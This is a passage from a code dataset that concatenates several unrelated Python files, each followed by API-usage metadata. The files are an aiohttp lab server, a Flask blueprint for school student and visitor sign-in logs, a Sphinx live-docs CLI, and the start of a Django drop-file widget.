    probe = _create_image(x, y, data)
    output, state = model_predict(weights, images, probe)
    return {
        'x': x,
        'y': y,
        'input': probe,
        'output': output,
        'state': int(state)
    }
def create():
    """Build the aiohttp application, wire up routes and templates, and run it."""
    app = web.Application()
    app.add_routes(routes)
    loader = jinja2.FileSystemLoader('lab07/templates')
    aiohttp_jinja2.setup(app, loader=loader)
    web.run_app(app, port=PORT)
# Start the development server when executed as a script.
if __name__ == '__main__':
    create()
| [
"aiohttp.web.run_app",
"aiohttp.client.MultiDict",
"secrets.token_hex",
"random.randrange",
"aiohttp.web.HTTPFound",
"aiohttp.web.Application",
"source.vectorize",
"random.random",
"aiohttp.web.HTTPBadRequest",
"source.fit_model",
"aiohttp.web.RouteTableDef",
"aiohttp_jinja2.template",
"jinj... | [((194, 213), 'aiohttp.web.RouteTableDef', 'web.RouteTableDef', ([], {}), '()\n', (211, 213), False, 'from aiohttp import web\n'), ((476, 511), 'aiohttp_jinja2.template', 'aiohttp_jinja2.template', (['"""fit.html"""'], {}), "('fit.html')\n", (499, 511), False, 'import aiohttp_jinja2\n'), ((2556, 2595), 'aiohttp_jinja2.template', 'aiohttp_jinja2.template', (['"""predict.html"""'], {}), "('predict.html')\n", (2579, 2595), False, 'import aiohttp_jinja2\n'), ((3480, 3518), 'aiohttp_jinja2.template', 'aiohttp_jinja2.template', (['"""result.html"""'], {}), "('result.html')\n", (3503, 3518), False, 'import aiohttp_jinja2\n'), ((381, 437), 'aiohttp.web.HTTPFound', 'web.HTTPFound', ([], {'location': 'f"""{base_url}/fit/{IMGS}:{X}-{Y}"""'}), "(location=f'{base_url}/fit/{IMGS}:{X}-{Y}')\n", (394, 437), False, 'from aiohttp import web\n'), ((887, 990), 'aiohttp.web.HTTPFound', 'web.HTTPFound', ([], {'location': 'f"""{base_url}/fit/{data[\'imgs\'] or IMGS}:{data[\'x\'] or X}-{data[\'y\'] or Y}"""'}), '(location=\n f"{base_url}/fit/{data[\'imgs\'] or IMGS}:{data[\'x\'] or X}-{data[\'y\'] or Y}")\n', (900, 990), False, 'from aiohttp import web\n'), ((1559, 1575), 'source.vectorize', 'vectorize', (['image'], {}), '(image)\n', (1568, 1575), False, 'from source import fit_model, vectorize, model_predict\n'), ((1679, 1694), 'aiohttp.client.MultiDict', 'MultiDict', (['data'], {}), '(data)\n', (1688, 1694), False, 'from aiohttp.client import MultiDict\n'), ((2198, 2218), 'secrets.token_hex', 'secrets.token_hex', (['(8)'], {}), '(8)\n', (2215, 2218), False, 'import secrets\n'), ((2295, 2348), 'aiohttp.web.HTTPFound', 'web.HTTPFound', ([], {'location': 'f"""{base_url}/predict/{token}"""'}), "(location=f'{base_url}/predict/{token}')\n", (2308, 2348), False, 'from aiohttp import web\n'), ((3279, 3304), 'random.randrange', 'random.randrange', (['(0)', 'imgs'], {}), '(0, imgs)\n', (3295, 3304), False, 'import random\n'), ((3741, 3778), 'source.model_predict', 'model_predict', 
(['weights', 'images', 'image'], {}), '(weights, images, image)\n', (3754, 3778), False, 'from source import fit_model, vectorize, model_predict\n'), ((3935, 3952), 'aiohttp.web.Application', 'web.Application', ([], {}), '()\n', (3950, 3952), False, 'from aiohttp import web\n'), ((4067, 4094), 'aiohttp.web.run_app', 'web.run_app', (['app'], {'port': 'PORT'}), '(app, port=PORT)\n', (4078, 4094), False, 'from aiohttp import web\n'), ((1310, 1323), 'source.vectorize', 'vectorize', (['im'], {}), '(im)\n', (1319, 1323), False, 'from source import fit_model, vectorize, model_predict\n'), ((1812, 1869), 'aiohttp.web.HTTPBadRequest', 'web.HTTPBadRequest', ([], {'text': 'f"""Invalid images number: {imgs}"""'}), "(text=f'Invalid images number: {imgs}')\n", (1830, 1869), False, 'from aiohttp import web\n'), ((2026, 2102), 'aiohttp.web.HTTPBadRequest', 'web.HTTPBadRequest', ([], {'text': 'f"""Invalid XY combination: X={x}, Y={y}, XY={x * y}"""'}), "(text=f'Invalid XY combination: X={x}, Y={y}, XY={x * y}')\n", (2044, 2102), False, 'from aiohttp import web\n'), ((2265, 2282), 'source.fit_model', 'fit_model', (['images'], {}), '(images)\n', (2274, 2282), False, 'from source import fit_model, vectorize, model_predict\n'), ((2895, 2983), 'aiohttp.web.HTTPBadRequest', 'web.HTTPBadRequest', ([], {'text': 'f"""Probability value exceeds [0, 1] limits: randomize={by}"""'}), "(text=\n f'Probability value exceeds [0, 1] limits: randomize={by}')\n", (2913, 2983), False, 'from aiohttp import web\n'), ((4018, 4060), 'jinja2.FileSystemLoader', 'jinja2.FileSystemLoader', (['"""lab07/templates"""'], {}), "('lab07/templates')\n", (4041, 4060), False, 'import jinja2\n'), ((3158, 3173), 'random.random', 'random.random', ([], {}), '()\n', (3171, 3173), False, 'import random\n')] |
from flask import Blueprint, render_template, url_for, session, flash, redirect, request
from edu_visitor import db
from edu_visitor.visitor_logs.forms import StudentSignInForm, StudentSignOutForm, VisitorSignInForm, VisitorSignOutForm, StudentUpdateForm, VisitorUpdateForm
from edu_visitor.models import StudentLog, VisitorLog
from flask_login import login_required
visitor_logs = Blueprint('visitor_logs', __name__)
# Route to the sign-in page for students
@visitor_logs.route('/student-signin', methods=['GET', 'POST'])
def student_signin():
    """Show the student sign-in form and record a log entry on valid submission."""
    form = StudentSignInForm()
    if form.validate_on_submit():
        # Record the sign-in for the current building
        entry = StudentLog(
            student_name=form.student_name.data,
            grade=form.grade.data,
            parent_name=form.parent.data,
            reason=form.reason.data,
            reason_other=form.reason_other.data,
            building=session['site'],
            direction='In',
        )
        db.session.add(entry)
        db.session.commit()
        flash(f"You have successfully signed in to { session['site'] }!",
        category='success')
        return redirect(url_for('main.home'))
    return render_template('student-signin.html', title='Student Sign-in', form=form)
# Route to the sign-out page for students
@visitor_logs.route('/student-signout', methods=['GET', 'POST'])
def student_signout():
    """Show the student sign-out form and record a log entry on valid submission."""
    form = StudentSignOutForm()
    if form.validate_on_submit():
        # Record the sign-out for the current building
        entry = StudentLog(
            student_name=form.student_name.data,
            grade=form.grade.data,
            parent_name=form.parent.data,
            reason=form.reason.data,
            reason_other=form.reason_other.data,
            building=session['site'],
            direction='Out',
        )
        db.session.add(entry)
        db.session.commit()
        flash(f"You have successfully signed out of { session['site'] }!",
        category='success')
        return redirect(url_for('main.home'))
    return render_template('student-signout.html', title='Student Sign-out', form=form)
# Route to the sign-in page for visitors
@visitor_logs.route('/visitor-signin', methods=['GET', 'POST'])
def visitor_signin():
    """Show the visitor sign-in form and record a log entry on valid submission."""
    form = VisitorSignInForm()
    if form.validate_on_submit():
        # Record the sign-in for the current building
        entry = VisitorLog(
            visitor_name=form.visitor_name.data,
            student_name=form.student_name.data,
            grade=form.grade.data,
            reason=form.reason.data,
            reason_other=form.reason_other.data,
            building=session['site'],
            direction='In',
        )
        db.session.add(entry)
        db.session.commit()
        flash(f"You have successfully signed in to { session['site'] }!",
        category='success')
        return redirect(url_for('main.home'))
    return render_template('visitor-signin.html', title='Visitor Sign-in', form=form)
# Route to the sign-out page for visitors
@visitor_logs.route('/visitor-signout', methods=['GET', 'POST'])
def visitor_signout():
    """Show the visitor sign-out form and record a log entry on valid submission."""
    form = VisitorSignOutForm()
    if form.validate_on_submit():
        # Only the visitor's name is collected on the way out
        entry = VisitorLog(
            visitor_name=form.visitor_name.data,
            building=session['site'],
            direction='Out',
        )
        db.session.add(entry)
        db.session.commit()
        flash(f"You have successfully signed out of { session['site'] }!",
        category='success')
        return redirect(url_for('main.home'))
    return render_template('visitor-signout.html', title='Visitor Sign-out', form=form)
# Route to display a summary of the day's student sign-ins and sign-outs
@visitor_logs.route('/daily-summary')
@login_required
def daily_summary():
    """Render paginated in/out logs for students and visitors at the current building."""
    # TODO: Create DB calls to create the dictionaries only for the current day
    def _page_of(model, direction, arg_name):
        # Newest-first page of log entries, page number taken from the URL.
        page = request.args.get(arg_name, 1, type=int)
        query = model.query.order_by(model.id.desc()).filter_by(direction=direction, building=session['site'])
        return query.paginate(page=page, per_page=5)
    student_log_in = _page_of(StudentLog, 'In', 'student_page_in')
    student_log_out = _page_of(StudentLog, 'Out', 'student_page_out')
    visitor_log_in = _page_of(VisitorLog, 'In', 'visitor_page_in')
    visitor_log_out = _page_of(VisitorLog, 'Out', 'visitor_page_out')
    return render_template('daily-summary.html', student_log_in=student_log_in, student_log_out=student_log_out, visitor_log_in=visitor_log_in, visitor_log_out=visitor_log_out, title='Daily Summary')
# A route to view a specific post for students
@visitor_logs.route('/student-signin/<int:post_id>')
@login_required
def view_student_signin(post_id):
    """Display a single student log entry, or 404 if it does not exist."""
    entry = StudentLog.query.get_or_404(post_id)
    return render_template('student-view.html', title="Update Entry", post=entry)
# A route to update a specific post for students
@visitor_logs.route('/student-signin/<int:post_id>/update', methods=['GET', 'POST'])
@login_required
def update_student_signin(post_id):
    """Edit a student log entry: save changes on POST, pre-fill the form on GET."""
    post = StudentLog.query.get_or_404(post_id)
    form = StudentUpdateForm()
    if form.validate_on_submit():
        # Copy the submitted values onto the stored entry
        post.student_name = form.student_name.data
        post.grade = form.grade.data
        post.parent_name = form.parent.data
        post.reason = form.reason.data
        post.reason_other = form.reason_other.data
        post.direction = form.direction.data
        db.session.commit()
        flash("Your post has been updated.", 'success')
        return redirect(url_for('visitor_logs.daily_summary'))
    if request.method == 'GET':
        # Pre-populate the form from the stored entry
        form.student_name.data = post.student_name
        form.grade.data = post.grade
        form.parent.data = post.parent_name
        form.reason.data = post.reason
        form.reason_other.data = post.reason_other
        form.direction.data = post.direction
    return render_template('student-update.html', title="Update Entry", post=post, form=form)
# A route to delete a specific post for students
@visitor_logs.route('/student-signin/<int:post_id>/delete', methods=['POST'])
@login_required
def delete_student_signin(post_id):
    """Delete a student log entry and return to the daily summary."""
    entry = StudentLog.query.get_or_404(post_id)
    db.session.delete(entry)
    db.session.commit()
    flash('The entry has been deleted.', category='success')
    return redirect(url_for('visitor_logs.daily_summary'))
# A route to view a specific post for visitors
@visitor_logs.route('/visitor-signin/<int:post_id>')
@login_required
def view_visitor_signin(post_id):
    """Display a single visitor log entry, or 404 if it does not exist."""
    post = VisitorLog.query.get_or_404(post_id)
    # BUG FIX: render_template expects a template filename; the original passed
    # the url_for-style 'visitor_logs.visitor-view.html', which would raise
    # TemplateNotFound. Every sibling view uses a plain filename.
    return render_template('visitor-view.html', title="Update Entry", post=post)
# A route to update a specific post for visitors
@visitor_logs.route('/visitor-signin/<int:post_id>/update', methods=['GET', 'POST'])
@login_required
def update_visitor_signin(post_id):
    """Edit a visitor log entry: save changes on POST, pre-fill the form on GET."""
    post = VisitorLog.query.get_or_404(post_id)
    form = VisitorUpdateForm()
    if form.validate_on_submit():
        # Copy the submitted values onto the stored entry
        post.visitor_name = form.visitor_name.data
        post.student_name = form.student_name.data
        post.grade = form.grade.data
        post.reason = form.reason.data
        post.reason_other = form.reason_other.data
        post.direction = form.direction.data
        db.session.commit()
        flash("Your post has been updated.", 'success')
        return redirect(url_for('visitor_logs.daily_summary'))
    if request.method == 'GET':
        # Pre-populate the form from the stored entry
        form.visitor_name.data = post.visitor_name
        form.student_name.data = post.student_name
        form.grade.data = post.grade
        form.reason.data = post.reason
        form.reason_other.data = post.reason_other
        form.direction.data = post.direction
    return render_template('visitor-update.html', title="Update Entry", post=post, form=form)
# A route to delete a specific post for visitor
@visitor_logs.route('/visitor-signin/<int:post_id>/delete', methods=['POST'])
@login_required
def delete_visitor_signin(post_id):
    """Delete a visitor log entry and return to the daily summary."""
    post = VisitorLog.query.get_or_404(post_id)
    db.session.delete(post)
    db.session.commit()
    flash('The entry has been deleted.', category='success')
    return redirect(url_for('visitor_logs.daily_summary')) | [
"flask.render_template",
"flask.request.args.get",
"edu_visitor.db.session.delete",
"edu_visitor.models.VisitorLog",
"edu_visitor.db.session.commit",
"edu_visitor.models.StudentLog.query.get_or_404",
"edu_visitor.visitor_logs.forms.StudentSignInForm",
"flask.flash",
"edu_visitor.visitor_logs.forms.V... | [((384, 419), 'flask.Blueprint', 'Blueprint', (['"""visitor_logs"""', '__name__'], {}), "('visitor_logs', __name__)\n", (393, 419), False, 'from flask import Blueprint, render_template, url_for, session, flash, redirect, request\n'), ((560, 579), 'edu_visitor.visitor_logs.forms.StudentSignInForm', 'StudentSignInForm', ([], {}), '()\n', (577, 579), False, 'from edu_visitor.visitor_logs.forms import StudentSignInForm, StudentSignOutForm, VisitorSignInForm, VisitorSignOutForm, StudentUpdateForm, VisitorUpdateForm\n'), ((1105, 1179), 'flask.render_template', 'render_template', (['"""student-signin.html"""'], {'title': '"""Student Sign-in"""', 'form': 'form'}), "('student-signin.html', title='Student Sign-in', form=form)\n", (1120, 1179), False, 'from flask import Blueprint, render_template, url_for, session, flash, redirect, request\n'), ((1323, 1343), 'edu_visitor.visitor_logs.forms.StudentSignOutForm', 'StudentSignOutForm', ([], {}), '()\n', (1341, 1343), False, 'from edu_visitor.visitor_logs.forms import StudentSignInForm, StudentSignOutForm, VisitorSignInForm, VisitorSignOutForm, StudentUpdateForm, VisitorUpdateForm\n'), ((1871, 1947), 'flask.render_template', 'render_template', (['"""student-signout.html"""'], {'title': '"""Student Sign-out"""', 'form': 'form'}), "('student-signout.html', title='Student Sign-out', form=form)\n", (1886, 1947), False, 'from flask import Blueprint, render_template, url_for, session, flash, redirect, request\n'), ((2088, 2107), 'edu_visitor.visitor_logs.forms.VisitorSignInForm', 'VisitorSignInForm', ([], {}), '()\n', (2105, 2107), False, 'from edu_visitor.visitor_logs.forms import StudentSignInForm, StudentSignOutForm, VisitorSignInForm, VisitorSignOutForm, StudentUpdateForm, VisitorUpdateForm\n'), ((2640, 2714), 'flask.render_template', 'render_template', (['"""visitor-signin.html"""'], {'title': '"""Visitor Sign-in"""', 'form': 'form'}), "('visitor-signin.html', title='Visitor Sign-in', 
form=form)\n", (2655, 2714), False, 'from flask import Blueprint, render_template, url_for, session, flash, redirect, request\n'), ((2858, 2878), 'edu_visitor.visitor_logs.forms.VisitorSignOutForm', 'VisitorSignOutForm', ([], {}), '()\n', (2876, 2878), False, 'from edu_visitor.visitor_logs.forms import StudentSignInForm, StudentSignOutForm, VisitorSignInForm, VisitorSignOutForm, StudentUpdateForm, VisitorUpdateForm\n'), ((3291, 3367), 'flask.render_template', 'render_template', (['"""visitor-signout.html"""'], {'title': '"""Visitor Sign-out"""', 'form': 'form'}), "('visitor-signout.html', title='Visitor Sign-out', form=form)\n", (3306, 3367), False, 'from flask import Blueprint, render_template, url_for, session, flash, redirect, request\n'), ((3737, 3785), 'flask.request.args.get', 'request.args.get', (['"""student_page_in"""', '(1)'], {'type': 'int'}), "('student_page_in', 1, type=int)\n", (3753, 3785), False, 'from flask import Blueprint, render_template, url_for, session, flash, redirect, request\n'), ((4040, 4089), 'flask.request.args.get', 'request.args.get', (['"""student_page_out"""', '(1)'], {'type': 'int'}), "('student_page_out', 1, type=int)\n", (4056, 4089), False, 'from flask import Blueprint, render_template, url_for, session, flash, redirect, request\n'), ((4339, 4387), 'flask.request.args.get', 'request.args.get', (['"""visitor_page_in"""', '(1)'], {'type': 'int'}), "('visitor_page_in', 1, type=int)\n", (4355, 4387), False, 'from flask import Blueprint, render_template, url_for, session, flash, redirect, request\n'), ((4634, 4683), 'flask.request.args.get', 'request.args.get', (['"""visitor_page_out"""', '(1)'], {'type': 'int'}), "('visitor_page_out', 1, type=int)\n", (4650, 4683), False, 'from flask import Blueprint, render_template, url_for, session, flash, redirect, request\n'), ((4862, 5058), 'flask.render_template', 'render_template', (['"""daily-summary.html"""'], {'student_log_in': 'student_log_in', 'student_log_out': 'student_log_out', 
'visitor_log_in': 'visitor_log_in', 'visitor_log_out': 'visitor_log_out', 'title': '"""Daily Summary"""'}), "('daily-summary.html', student_log_in=student_log_in,\n student_log_out=student_log_out, visitor_log_in=visitor_log_in,\n visitor_log_out=visitor_log_out, title='Daily Summary')\n", (4877, 5058), False, 'from flask import Blueprint, render_template, url_for, session, flash, redirect, request\n'), ((5214, 5250), 'edu_visitor.models.StudentLog.query.get_or_404', 'StudentLog.query.get_or_404', (['post_id'], {}), '(post_id)\n', (5241, 5250), False, 'from edu_visitor.models import StudentLog, VisitorLog\n'), ((5262, 5331), 'flask.render_template', 'render_template', (['"""student-view.html"""'], {'title': '"""Update Entry"""', 'post': 'post'}), "('student-view.html', title='Update Entry', post=post)\n", (5277, 5331), False, 'from flask import Blueprint, render_template, url_for, session, flash, redirect, request\n'), ((5531, 5567), 'edu_visitor.models.StudentLog.query.get_or_404', 'StudentLog.query.get_or_404', (['post_id'], {}), '(post_id)\n', (5558, 5567), False, 'from edu_visitor.models import StudentLog, VisitorLog\n'), ((5579, 5598), 'edu_visitor.visitor_logs.forms.StudentUpdateForm', 'StudentUpdateForm', ([], {}), '()\n', (5596, 5598), False, 'from edu_visitor.visitor_logs.forms import StudentSignInForm, StudentSignOutForm, VisitorSignInForm, VisitorSignOutForm, StudentUpdateForm, VisitorUpdateForm\n'), ((6387, 6473), 'flask.render_template', 'render_template', (['"""student-update.html"""'], {'title': '"""Update Entry"""', 'post': 'post', 'form': 'form'}), "('student-update.html', title='Update Entry', post=post,\n form=form)\n", (6402, 6473), False, 'from flask import Blueprint, render_template, url_for, session, flash, redirect, request\n'), ((6662, 6698), 'edu_visitor.models.StudentLog.query.get_or_404', 'StudentLog.query.get_or_404', (['post_id'], {}), '(post_id)\n', (6689, 6698), False, 'from edu_visitor.models import StudentLog, VisitorLog\n'), 
((6703, 6726), 'edu_visitor.db.session.delete', 'db.session.delete', (['post'], {}), '(post)\n', (6720, 6726), False, 'from edu_visitor import db\n'), ((6731, 6750), 'edu_visitor.db.session.commit', 'db.session.commit', ([], {}), '()\n', (6748, 6750), False, 'from edu_visitor import db\n'), ((6755, 6811), 'flask.flash', 'flash', (['"""The entry has been deleted."""'], {'category': '"""success"""'}), "('The entry has been deleted.', category='success')\n", (6760, 6811), False, 'from flask import Blueprint, render_template, url_for, session, flash, redirect, request\n'), ((7034, 7070), 'edu_visitor.models.VisitorLog.query.get_or_404', 'VisitorLog.query.get_or_404', (['post_id'], {}), '(post_id)\n', (7061, 7070), False, 'from edu_visitor.models import StudentLog, VisitorLog\n'), ((7082, 7168), 'flask.render_template', 'render_template', (['"""visitor_logs.visitor-view.html"""'], {'title': '"""Update Entry"""', 'post': 'post'}), "('visitor_logs.visitor-view.html', title='Update Entry',\n post=post)\n", (7097, 7168), False, 'from flask import Blueprint, render_template, url_for, session, flash, redirect, request\n'), ((7364, 7400), 'edu_visitor.models.VisitorLog.query.get_or_404', 'VisitorLog.query.get_or_404', (['post_id'], {}), '(post_id)\n', (7391, 7400), False, 'from edu_visitor.models import StudentLog, VisitorLog\n'), ((7412, 7431), 'edu_visitor.visitor_logs.forms.VisitorUpdateForm', 'VisitorUpdateForm', ([], {}), '()\n', (7429, 7431), False, 'from edu_visitor.visitor_logs.forms import StudentSignInForm, StudentSignOutForm, VisitorSignInForm, VisitorSignOutForm, StudentUpdateForm, VisitorUpdateForm\n'), ((8234, 8320), 'flask.render_template', 'render_template', (['"""visitor-update.html"""'], {'title': '"""Update Entry"""', 'post': 'post', 'form': 'form'}), "('visitor-update.html', title='Update Entry', post=post,\n form=form)\n", (8249, 8320), False, 'from flask import Blueprint, render_template, url_for, session, flash, redirect, request\n'), ((8508, 8544), 
'edu_visitor.models.VisitorLog.query.get_or_404', 'VisitorLog.query.get_or_404', (['post_id'], {}), '(post_id)\n', (8535, 8544), False, 'from edu_visitor.models import StudentLog, VisitorLog\n'), ((8549, 8572), 'edu_visitor.db.session.delete', 'db.session.delete', (['post'], {}), '(post)\n', (8566, 8572), False, 'from edu_visitor import db\n'), ((8577, 8596), 'edu_visitor.db.session.commit', 'db.session.commit', ([], {}), '()\n', (8594, 8596), False, 'from edu_visitor import db\n'), ((8601, 8657), 'flask.flash', 'flash', (['"""The entry has been deleted."""'], {'category': '"""success"""'}), "('The entry has been deleted.', category='success')\n", (8606, 8657), False, 'from flask import Blueprint, render_template, url_for, session, flash, redirect, request\n'), ((678, 891), 'edu_visitor.models.StudentLog', 'StudentLog', ([], {'student_name': 'form.student_name.data', 'grade': 'form.grade.data', 'parent_name': 'form.parent.data', 'reason': 'form.reason.data', 'reason_other': 'form.reason_other.data', 'building': "session['site']", 'direction': '"""In"""'}), "(student_name=form.student_name.data, grade=form.grade.data,\n parent_name=form.parent.data, reason=form.reason.data, reason_other=\n form.reason_other.data, building=session['site'], direction='In')\n", (688, 891), False, 'from edu_visitor.models import StudentLog, VisitorLog\n'), ((891, 911), 'edu_visitor.db.session.add', 'db.session.add', (['post'], {}), '(post)\n', (905, 911), False, 'from edu_visitor import db\n'), ((920, 939), 'edu_visitor.db.session.commit', 'db.session.commit', ([], {}), '()\n', (937, 939), False, 'from edu_visitor import db\n'), ((948, 1036), 'flask.flash', 'flash', (['f"""You have successfully signed in to {session[\'site\']}!"""'], {'category': '"""success"""'}), '(f"You have successfully signed in to {session[\'site\']}!", category=\n \'success\')\n', (953, 1036), False, 'from flask import Blueprint, render_template, url_for, session, flash, redirect, request\n'), ((1442, 1656), 
'edu_visitor.models.StudentLog', 'StudentLog', ([], {'student_name': 'form.student_name.data', 'grade': 'form.grade.data', 'parent_name': 'form.parent.data', 'reason': 'form.reason.data', 'reason_other': 'form.reason_other.data', 'building': "session['site']", 'direction': '"""Out"""'}), "(student_name=form.student_name.data, grade=form.grade.data,\n parent_name=form.parent.data, reason=form.reason.data, reason_other=\n form.reason_other.data, building=session['site'], direction='Out')\n", (1452, 1656), False, 'from edu_visitor.models import StudentLog, VisitorLog\n'), ((1656, 1676), 'edu_visitor.db.session.add', 'db.session.add', (['post'], {}), '(post)\n', (1670, 1676), False, 'from edu_visitor import db\n'), ((1685, 1704), 'edu_visitor.db.session.commit', 'db.session.commit', ([], {}), '()\n', (1702, 1704), False, 'from edu_visitor import db\n'), ((1713, 1802), 'flask.flash', 'flash', (['f"""You have successfully signed out of {session[\'site\']}!"""'], {'category': '"""success"""'}), '(f"You have successfully signed out of {session[\'site\']}!", category=\n \'success\')\n', (1718, 1802), False, 'from flask import Blueprint, render_template, url_for, session, flash, redirect, request\n'), ((2206, 2430), 'edu_visitor.models.VisitorLog', 'VisitorLog', ([], {'visitor_name': 'form.visitor_name.data', 'student_name': 'form.student_name.data', 'grade': 'form.grade.data', 'reason': 'form.reason.data', 'reason_other': 'form.reason_other.data', 'building': "session['site']", 'direction': '"""In"""'}), "(visitor_name=form.visitor_name.data, student_name=form.\n student_name.data, grade=form.grade.data, reason=form.reason.data,\n reason_other=form.reason_other.data, building=session['site'],\n direction='In')\n", (2216, 2430), False, 'from edu_visitor.models import StudentLog, VisitorLog\n'), ((2426, 2446), 'edu_visitor.db.session.add', 'db.session.add', (['post'], {}), '(post)\n', (2440, 2446), False, 'from edu_visitor import db\n'), ((2455, 2474), 
'edu_visitor.db.session.commit', 'db.session.commit', ([], {}), '()\n', (2472, 2474), False, 'from edu_visitor import db\n'), ((2483, 2571), 'flask.flash', 'flash', (['f"""You have successfully signed in to {session[\'site\']}!"""'], {'category': '"""success"""'}), '(f"You have successfully signed in to {session[\'site\']}!", category=\n \'success\')\n', (2488, 2571), False, 'from flask import Blueprint, render_template, url_for, session, flash, redirect, request\n'), ((2977, 3071), 'edu_visitor.models.VisitorLog', 'VisitorLog', ([], {'visitor_name': 'form.visitor_name.data', 'building': "session['site']", 'direction': '"""Out"""'}), "(visitor_name=form.visitor_name.data, building=session['site'],\n direction='Out')\n", (2987, 3071), False, 'from edu_visitor.models import StudentLog, VisitorLog\n'), ((3076, 3096), 'edu_visitor.db.session.add', 'db.session.add', (['post'], {}), '(post)\n', (3090, 3096), False, 'from edu_visitor import db\n'), ((3105, 3124), 'edu_visitor.db.session.commit', 'db.session.commit', ([], {}), '()\n', (3122, 3124), False, 'from edu_visitor import db\n'), ((3133, 3222), 'flask.flash', 'flash', (['f"""You have successfully signed out of {session[\'site\']}!"""'], {'category': '"""success"""'}), '(f"You have successfully signed out of {session[\'site\']}!", category=\n \'success\')\n', (3138, 3222), False, 'from flask import Blueprint, render_template, url_for, session, flash, redirect, request\n'), ((5908, 5927), 'edu_visitor.db.session.commit', 'db.session.commit', ([], {}), '()\n', (5925, 5927), False, 'from edu_visitor import db\n'), ((5936, 5983), 'flask.flash', 'flash', (['"""Your post has been updated."""', '"""success"""'], {}), "('Your post has been updated.', 'success')\n", (5941, 5983), False, 'from flask import Blueprint, render_template, url_for, session, flash, redirect, request\n'), ((6832, 6869), 'flask.url_for', 'url_for', (['"""visitor_logs.daily_summary"""'], {}), "('visitor_logs.daily_summary')\n", (6839, 6869), False, 
'from flask import Blueprint, render_template, url_for, session, flash, redirect, request\n'), ((7748, 7767), 'edu_visitor.db.session.commit', 'db.session.commit', ([], {}), '()\n', (7765, 7767), False, 'from edu_visitor import db\n'), ((7776, 7823), 'flask.flash', 'flash', (['"""Your post has been updated."""', '"""success"""'], {}), "('Your post has been updated.', 'success')\n", (7781, 7823), False, 'from flask import Blueprint, render_template, url_for, session, flash, redirect, request\n'), ((8678, 8715), 'flask.url_for', 'url_for', (['"""visitor_logs.daily_summary"""'], {}), "('visitor_logs.daily_summary')\n", (8685, 8715), False, 'from flask import Blueprint, render_template, url_for, session, flash, redirect, request\n'), ((1072, 1092), 'flask.url_for', 'url_for', (['"""main.home"""'], {}), "('main.home')\n", (1079, 1092), False, 'from flask import Blueprint, render_template, url_for, session, flash, redirect, request\n'), ((1838, 1858), 'flask.url_for', 'url_for', (['"""main.home"""'], {}), "('main.home')\n", (1845, 1858), False, 'from flask import Blueprint, render_template, url_for, session, flash, redirect, request\n'), ((2607, 2627), 'flask.url_for', 'url_for', (['"""main.home"""'], {}), "('main.home')\n", (2614, 2627), False, 'from flask import Blueprint, render_template, url_for, session, flash, redirect, request\n'), ((3258, 3278), 'flask.url_for', 'url_for', (['"""main.home"""'], {}), "('main.home')\n", (3265, 3278), False, 'from flask import Blueprint, render_template, url_for, session, flash, redirect, request\n'), ((6008, 6045), 'flask.url_for', 'url_for', (['"""visitor_logs.daily_summary"""'], {}), "('visitor_logs.daily_summary')\n", (6015, 6045), False, 'from flask import Blueprint, render_template, url_for, session, flash, redirect, request\n'), ((7848, 7885), 'flask.url_for', 'url_for', (['"""visitor_logs.daily_summary"""'], {}), "('visitor_logs.daily_summary')\n", (7855, 7885), False, 'from flask import Blueprint, render_template, url_for, 
session, flash, redirect, request\n'), ((3833, 3853), 'edu_visitor.models.StudentLog.id.desc', 'StudentLog.id.desc', ([], {}), '()\n', (3851, 3853), False, 'from edu_visitor.models import StudentLog, VisitorLog\n'), ((4138, 4158), 'edu_visitor.models.StudentLog.id.desc', 'StudentLog.id.desc', ([], {}), '()\n', (4156, 4158), False, 'from edu_visitor.models import StudentLog, VisitorLog\n'), ((4435, 4455), 'edu_visitor.models.VisitorLog.id.desc', 'VisitorLog.id.desc', ([], {}), '()\n', (4453, 4455), False, 'from edu_visitor.models import StudentLog, VisitorLog\n'), ((4732, 4752), 'edu_visitor.models.VisitorLog.id.desc', 'VisitorLog.id.desc', ([], {}), '()\n', (4750, 4752), False, 'from edu_visitor.models import StudentLog, VisitorLog\n')] |
import os
import sys
from argparse import ArgumentParser
from sphinxviewer.sphinx import build_html
from sphinxviewer.server import serve_server
def main():
    """Entry point: build the Sphinx docs once, then serve them live.

    Command-line options:
        -p/--port       port to run the server on (default 8888)
        -d/--build-dir  sphinx build directory (default "_build")

    Exits with status 1 if the initial build fails.
    """
    parser = ArgumentParser(description="Live editing sphinx doc server")
    # Previously these options were commented out and the values hard-coded;
    # defaults are unchanged, so existing invocations behave identically.
    parser.add_argument("-p", "--port", type=int, default=8888,
                        help="Port to run server on")
    parser.add_argument("-d", "--build-dir", default="_build",
                        help="Build directory")
    args = parser.parse_args()
    print("Building initial docs")
    # TODO Parameterize the source directory. Currently follows the
    # sphinx default (the current working directory).
    success = build_html(os.getcwd(), args.build_dir)
    if not success:
        sys.exit(1)
    serve_server(args.port)
| [
"sphinxviewer.server.serve_server",
"sys.exit",
"argparse.ArgumentParser",
"os.getcwd"
] | [((174, 234), 'argparse.ArgumentParser', 'ArgumentParser', ([], {'description': '"""Live editing sphinx doc server"""'}), "(description='Live editing sphinx doc server')\n", (188, 234), False, 'from argparse import ArgumentParser\n'), ((668, 686), 'sphinxviewer.server.serve_server', 'serve_server', (['(8888)'], {}), '(8888)\n', (680, 686), False, 'from sphinxviewer.server import serve_server\n'), ((601, 612), 'os.getcwd', 'os.getcwd', ([], {}), '()\n', (610, 612), False, 'import os\n'), ((652, 663), 'sys.exit', 'sys.exit', (['(1)'], {}), '(1)\n', (660, 663), False, 'import sys\n')] |
import mimetypes
from django.contrib.staticfiles.storage import staticfiles_storage
from django.core import signing
from django.forms import widgets
from django.forms.utils import flatatt
from django.utils.safestring import mark_safe
from django.utils.html import format_html
from django.utils.translation import ugettext_lazy as _
from djng import app_settings
class DropFileWidget(widgets.Widget):
    """Drag-and-drop file-upload widget for django-angular.

    Renders a <textarea> drop zone plus a spinner, a delete button and
    (when a file is already attached) a download link.  The current file
    name is signed so the client cannot tamper with it.
    """
    # Used to sign the current file name embedded in the widget markup.
    signer = signing.Signer()
    def __init__(self, area_label, fileupload_url, attrs=None):
        # area_label: text shown inside the drop area.
        # fileupload_url: endpoint the AngularJS uploader posts the file to.
        self.area_label = area_label
        self.fileupload_url = fileupload_url
        super(DropFileWidget, self).__init__(attrs)
        # Subclasses (e.g. DropImageWidget) override this to select icons/CSS.
        self.filetype = 'file'
    def render(self, name, value, attrs=None, renderer=None):
        """Return the widget's HTML as a safe string.

        ``attrs`` must contain 'id' and 'ng-model'; they are interpolated
        into the AngularJS upload/delete expressions below.
        """
        from django.contrib.staticfiles.storage import staticfiles_storage
        extra_attrs = dict(attrs)
